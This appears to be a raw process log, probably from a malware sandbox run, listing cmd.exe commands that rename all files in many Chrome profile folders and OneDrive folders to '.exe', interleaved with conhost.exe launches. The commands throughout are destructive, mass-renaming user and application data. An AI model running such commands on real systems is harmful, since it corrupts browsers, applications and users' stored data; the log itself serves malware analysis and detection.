"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\*.*" "*.exe"


"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\am-ET\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ar\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\arm64\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\as-IN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\az-Latn-AZ\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\be\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bg\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-BD\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-IN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bs-Latn-BA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca-Es-VALENCIA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cy-GB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\da\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\de\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\el\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-GB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-US\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\es\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\et\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\eu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fa\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fil-PH\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ga-IE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gd\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ha-Latn-NG\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\he\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\id\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ig-NG\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\imageformats\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\IRMProtectors\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\is\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\it\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ja\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ka\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\km-KH\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

